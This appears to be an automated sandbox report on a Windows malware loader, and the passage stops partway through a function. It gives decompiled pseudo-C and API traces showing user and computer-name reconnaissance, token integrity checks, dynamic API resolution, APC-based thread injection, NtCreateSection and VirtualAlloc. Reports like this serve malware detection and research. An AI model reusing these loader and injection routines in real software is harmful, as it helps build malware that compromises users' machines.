RtlInitializeCriticalSection.NTDLL(038F95F0), ref: 00FC2EC1
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00FC2EEA
wsprintfA.USER32 ref: 00FC2F1A

Part of subcall function 00FC3946: GetUserNameW.ADVAPI32(00000000,00FC2F3F), ref: 00FC397D
Part of subcall function 00FC3946: RtlAllocateHeap.NTDLL(00000000,00FC2F3F), ref: 00FC3994
Part of subcall function 00FC3946: GetUserNameW.ADVAPI32(00000000,00FC2F3F), ref: 00FC39A1
Part of subcall function 00FC3946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FC2F3F,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC39C2
Part of subcall function 00FC3946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FC39E9
Part of subcall function 00FC3946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FC39FD
Part of subcall function 00FC3946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FC3A0A
Part of subcall function 00FC3946: HeapFree.KERNEL32(00000000,00000000), ref: 00FC3A28

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: 34f0c42e45604abc25035dd579b0dab34559d4350da3a64b3c6ea77c0dde8508
Instruction ID: dbcdd722c6254bd637aab621c3d310dd41c07307af2fce830347b248e25f1632
Opcode Fuzzy Hash: 34f0c42e45604abc25035dd579b0dab34559d4350da3a64b3c6ea77c0dde8508
Instruction Fuzzy Hash: 4E51CD71E0021EABD761DB649E8BFAE73B8EB04B24F04011DE805E7251D775AD40FBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC1041(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xfca2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00FC5C4E(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00FC2A03(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00fc104e
0x00fc1055
0x00fc105c
0x00fc1070
0x00fc107b
0x00fc1093
0x00fc10a0
0x00fc10a3
0x00fc10a8
0x00fc10b3
0x00fc10b7
0x00fc10c6
0x00fc10ca
0x00fc10e6
0x00fc10e6
0x00fc10ea
0x00fc10ea
0x00fc10ef
0x00fc10f3
0x00fc10f9
0x00fc10fa
0x00fc1101
0x00fc1107

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00FC1073
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00FC1093
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00FC10A3
CloseHandle.KERNEL32(00000000), ref: 00FC10F3

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00FC10C6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00FC10CE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00FC10DE

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 78d8fe9ef6a5562b41280ceaccec8f690ae1625d26f637d897b8ab8aba6870e8
Instruction ID: 554a10628835b58b0df32e247ebacdd91d52ed6487d17404fa8b7a076fab75ee
Opcode Fuzzy Hash: 78d8fe9ef6a5562b41280ceaccec8f690ae1625d26f637d897b8ab8aba6870e8
Instruction Fuzzy Hash: 69217A7594024EFFEB109FA0CE86EEEBBB9FB04304F0000A9E511A2161DB719A54EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4430, Relevance: 10.6, APIs: 7, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00FC4430(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xfca290 = _t14;
				if(_t14 != 0) {
					 *0xfca180 = GetTickCount();
					_t16 = E00FC2A18(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00FC80B2();
						_t40 = _t18 + _t20;
						_t22 = E00FC3F5D(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0xfca2ac; // 0x22c
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xfca2b8 = 1; // executed
						}
					}
					_t16 = E00FC2D63(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00fc4430
0x00fc4445
0x00fc444d
0x00fc4452
0x00fc4465
0x00fc446a
0x00fc4471
0x00fc44f9
0x00fc44ff
0x00000000
0x00000000
0x00000000
0x00fc4477
0x00fc4477
0x00fc447c
0x00fc4482
0x00fc4488
0x00fc4492
0x00fc4496
0x00fc4497
0x00fc449c
0x00fc449d
0x00fc449e
0x00fc44a3
0x00fc44a9
0x00fc44b2
0x00fc44b8
0x00fc44be
0x00fc44c3
0x00fc44ca
0x00fc44ce
0x00fc44d6
0x00fc44de
0x00fc44e0
0x00fc44e0
0x00fc44e8
0x00fc44ea
0x00fc44ea
0x00fc44e8
0x00fc44f4
0x00000000
0x00fc44f4
0x00fc4456
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FC4445
GetTickCount.KERNEL32 ref: 00FC445C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00FC447C
SwitchToThread.KERNEL32(?,00000001), ref: 00FC4482
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00FC449E
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00FC44B8
IsWow64Process.KERNEL32(0000022C,?,?,00000001), ref: 00FC44D6

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 8066d8a71b1a72c8f6ff01fd1b99c7c0a7187202746f1b5f1d32bf0225943179
Instruction ID: db57429eafc90c86641b14f07373cda2b6314682fbc98b55a654888dae8debe4
Opcode Fuzzy Hash: 8066d8a71b1a72c8f6ff01fd1b99c7c0a7187202746f1b5f1d32bf0225943179
Instruction Fuzzy Hash: 5521F0B2E04209AFD714EF74DE9BF6A7BA8EB44360F10492DF905C3190D774A804EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FC5AE3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00FC5AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0xfca2d0; // 0x292d5a8
				_t1 = _t9 + 0xfcb61b; // 0x253d7325
				_t36 = 0;
				_t28 = E00FC47BA(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x38f9631
					_t40 = E00FC5C4E(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E00FC1AF1(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E00FC2A03(_t40);
						_t42 = E00FC332F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E00FC2A03(_t36);
							_t36 = _t42;
						}
						_t43 = E00FC4138(_t36, _t33);
						if(_t43 != 0) {
							E00FC2A03(_t36);
							_t36 = _t43;
						}
					}
					E00FC2A03(_t28);
				}
				return _t36;
			}

0x00fc5ae3
0x00fc5ae6
0x00fc5ae7
0x00fc5aee
0x00fc5af5
0x00fc5afc
0x00fc5b00
0x00fc5b07
0x00fc5b0e
0x00fc5b13
0x00fc5b1b
0x00fc5b25
0x00fc5b29
0x00fc5b2d
0x00fc5b33
0x00fc5b38
0x00fc5b42
0x00fc5b48
0x00fc5b4a
0x00fc5b61
0x00fc5b65
0x00fc5b68
0x00fc5b6d
0x00fc5b6d
0x00fc5b76
0x00fc5b7a
0x00fc5b7d
0x00fc5b82
0x00fc5b82
0x00fc5b7a
0x00fc5b85
0x00fc5b8a
0x00fc5b90

APIs

Part of subcall function 00FC47BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FC5AFC,253D7325,00000000,00000000,?,00000000,00FC6301), ref: 00FC4821
Part of subcall function 00FC47BA: sprintf.NTDLL ref: 00FC4842

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B0E
lstrlen.KERNEL32(00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B16

Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A

strcpy.NTDLL ref: 00FC5B2D
lstrcat.KERNEL32(00000000,00000000), ref: 00FC5B38

Part of subcall function 00FC1AF1: lstrlen.KERNEL32(00000000,00000000,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC1B02

Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FC6301,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B55

Part of subcall function 00FC332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00FC5B61,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC3339
Part of subcall function 00FC332F: _snprintf.NTDLL ref: 00FC3397

Strings

=, xrefs: 00FC5B4F

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 46e1ac1e93cb3e6d2090dd6bcbe6717f2ff5abc2cafe717ef82c7e423cae2f92
Instruction ID: 178fd37ebc73c2d97c7ff4436f7dac5f115b273f21a3d820e91ce4c2aaa4c611
Opcode Fuzzy Hash: 46e1ac1e93cb3e6d2090dd6bcbe6717f2ff5abc2cafe717ef82c7e423cae2f92
Instruction Fuzzy Hash: 5611E33390052B2B8712B7749E87EAE7A9D9F85B64309001DF9019B102CF6CED01B7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1671, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00FC16B2
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FC1734
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FC1773
SysFreeString.OLEAUT32(00000000), ref: 00FC1795

Part of subcall function 00FC13B4: SysAllocString.OLEAUT32(00FC92D0), ref: 00FC1404

SafeArrayDestroy.OLEAUT32(?), ref: 00FC17E9
SysFreeString.OLEAUT32(?), ref: 00FC17F7

Part of subcall function 00FC5872: Sleep.KERNELBASE(000001F4), ref: 00FC58BA

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: e52bf0b86c1769a687a47a953c24d947491bf2050adf3b6fa2e9f9900e2197a7
Instruction ID: 2b8d673dd3c739b3b7f3d83c305563046a3d888c48d9ab527e29199af0e53623
Opcode Fuzzy Hash: e52bf0b86c1769a687a47a953c24d947491bf2050adf3b6fa2e9f9900e2197a7
Instruction Fuzzy Hash: 18514E3690020EEFCB00DFA4C989DAEB7B6FF89350B14896CE505EB221DB35AD55DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E051AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E051AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E051C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e0541d0 + 0x6e055014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e0550e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E05136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e0550f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e055104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e055119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e0541d0 + 0x6e05512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E0518D1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e051ab3
0x6e051ab7
0x6e051b78
0x6e051abd
0x6e051ad5
0x6e051ae4
0x6e051aeb
0x6e051aef
0x6e051af2
0x6e051b70
0x6e051b71
0x6e051af4
0x6e051b01
0x6e051b05
0x6e051b08
0x00000000
0x6e051b0a
0x6e051b17
0x6e051b1b
0x6e051b1e
0x00000000
0x6e051b20
0x6e051b2d
0x6e051b31
0x6e051b34
0x00000000
0x6e051b36
0x6e051b43
0x6e051b47
0x6e051b4a
0x00000000
0x6e051b4c
0x6e051b52
0x6e051b58
0x6e051b5d
0x6e051b64
0x6e051b67
0x00000000
0x6e051b69
0x6e051b6c
0x6e051b6c
0x6e051b67
0x6e051b4a
0x6e051b34
0x6e051b1e
0x6e051b08
0x6e051af2
0x6e051b86

APIs

Part of subcall function 6E051C8F: HeapAlloc.KERNEL32(00000000,?,6E05117D,?,00000000,00000000,?,?,?,6E051810), ref: 6E051C9B

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E051272,?,?,?,?,00000002,00000000,?,?), ref: 6E051AC9
GetProcAddress.KERNEL32(00000000,?), ref: 6E051AEB
GetProcAddress.KERNEL32(00000000,?), ref: 6E051B01
GetProcAddress.KERNEL32(00000000,?), ref: 6E051B17
GetProcAddress.KERNEL32(00000000,?), ref: 6E051B2D
GetProcAddress.KERNEL32(00000000,?), ref: 6E051B43

Part of subcall function 6E0518D1: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6E05192E
Part of subcall function 6E0518D1: memset.NTDLL ref: 6E051950

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: addb383dcf0a247a8ed5d69168a07056963f7f6558a2746290e06db661af9f6a
Instruction ID: 27570ec3e8125e34ab7f3adaa770dbf98e78e527a34629217c6a048ebf51dea6
Opcode Fuzzy Hash: addb383dcf0a247a8ed5d69168a07056963f7f6558a2746290e06db661af9f6a
Instruction Fuzzy Hash: 312174B5500B0AAFEB50DFA9CA90F5B7BECFF46284B004425E845D7351E734E925CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E051E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e054188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e05418c;
						if( *0x6e05418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e054198;
								if( *0x6e054198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e05418c);
						}
						HeapDestroy( *0x6e054190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e054188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6e054190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e0541b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E051CA4(E6E051D32, E6E051EE0(_a12, 1, 0x6e054198, _t41));
							 *0x6e05418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e051e07
0x6e051e13
0x6e051e15
0x6e051e18
0x6e051e8e
0x6e051e94
0x6e051e96
0x6e051e98
0x6e051e9e
0x6e051ea0
0x6e051ea5
0x6e051ea8
0x6e051eb3
0x6e051eb5
0x00000000
0x00000000
0x6e051eb7
0x6e051eba
0x6e051ebc
0x00000000
0x00000000
0x00000000
0x6e051ebc
0x6e051ec4
0x6e051ec4
0x6e051ed0
0x6e051ed0
0x6e051e1a
0x6e051e1b
0x6e051e3b
0x6e051e41
0x6e051e43
0x6e051e48
0x6e051e84
0x6e051e84
0x6e051e4a
0x6e051e52
0x6e051e59
0x6e051e63
0x6e051e6f
0x6e051e76
0x6e051e7b
0x6e051e80
0x00000000
0x6e051e80
0x6e051e7b
0x6e051e48
0x6e051e1b
0x6e051edd

APIs

InterlockedIncrement.KERNEL32(6E054188), ref: 6E051E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E051E3B

Part of subcall function 6E051CA4: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E054198,6E051E74), ref: 6E051CBB
Part of subcall function 6E051CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E051CD0
Part of subcall function 6E051CA4: GetLastError.KERNEL32(00000000), ref: 6E051CDB
Part of subcall function 6E051CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E051CE5
Part of subcall function 6E051CA4: CloseHandle.KERNEL32(00000000), ref: 6E051CEC
Part of subcall function 6E051CA4: SetLastError.KERNEL32(00000000), ref: 6E051CF5

InterlockedDecrement.KERNEL32(6E054188), ref: 6E051E8E
SleepEx.KERNEL32(00000064,00000001), ref: 6E051EA8
CloseHandle.KERNEL32 ref: 6E051EC4
HeapDestroy.KERNEL32 ref: 6E051ED0

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 47a43843629dde8e66c623ed85faae1d5f2a3c36afb7ad3f26b45cbb322401d3
Instruction ID: 6dc3f6860c878178266abd800aee5e8ef9d0146646279f67a536916a6bf74d57
Opcode Fuzzy Hash: 47a43843629dde8e66c623ed85faae1d5f2a3c36afb7ad3f26b45cbb322401d3
Instruction Fuzzy Hash: 65214F71A00B05FBCB409FE9DA98B8A7BE8FB5A2A47200529F516D3248E7348925CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E051CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E051CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e0541cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e051cbb
0x6e051cc1
0x6e051cc5
0x6e051cd0
0x6e051cd8
0x6e051ce1
0x6e051ce5
0x6e051cec
0x6e051cf3
0x6e051cf5
0x6e051cfb
0x6e051cd8
0x6e051cff

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6E054198,6E051E74), ref: 6E051CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E051CD0
GetLastError.KERNEL32(00000000), ref: 6E051CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 6E051CE5
CloseHandle.KERNEL32(00000000), ref: 6E051CEC
SetLastError.KERNEL32(00000000), ref: 6E051CF5

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 47d9b66441fd24d5981991a5dde4fb77335a57c3251e412dd7b22bd2a1aabfa3
Instruction ID: 9296a742ad03ee691f7f910d3cd9013dbedaeb9851969717e081b4de30d78abb
Opcode Fuzzy Hash: 47d9b66441fd24d5981991a5dde4fb77335a57c3251e412dd7b22bd2a1aabfa3
Instruction Fuzzy Hash: 7CF01237205F21BBDB125FE08E5CF5F7F69FB0E751F005404F60591155C72988259B95

Uniqueness

Uniqueness Score: -1.00%

Function 00FC344C, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00FC34A3
SysAllocString.OLEAUT32(00FC20DE), ref: 00FC34E6
SysFreeString.OLEAUT32(00000000), ref: 00FC34FA
SysFreeString.OLEAUT32(00000000), ref: 00FC3508

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 214293c7871156a2b3c931eabe7948740da5eb1d9154913739a833af168408b4
Instruction ID: e9efb537d2b77c5e3663b126dd9db1bfa28d3c90ecb49bfdb18b1a141bf2a125
Opcode Fuzzy Hash: 214293c7871156a2b3c931eabe7948740da5eb1d9154913739a833af168408b4
Instruction Fuzzy Hash: 70314C7290010AEF8B05CF98DAC5DEEBBB5FF48344B24842EE50697210E7359A45EF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E0515A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E0515A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6e0541b0;
				_t39 = E6E051A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
